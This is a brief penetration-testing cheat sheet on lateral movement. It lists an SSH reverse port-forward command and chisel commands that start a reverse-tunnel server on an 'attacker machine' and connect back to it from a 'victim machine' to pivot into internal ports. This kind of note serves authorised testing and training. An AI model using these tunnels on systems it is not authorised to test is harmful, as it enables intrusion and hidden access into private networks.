Lateral Movement
Lateral Movement
SSH Tunneling
ssh -R <PORT>:localhost:<PORT> <user>@<ip>
Pivoting (chisel)
In the attacker machine run chisel:
./chisel server -p 4000 -reverse -v
Upload chisel executable to victim machine and run:
./chisel client <IP>:4000 R:<RPORT>:127.0.0.1:<LPORT>
Last updated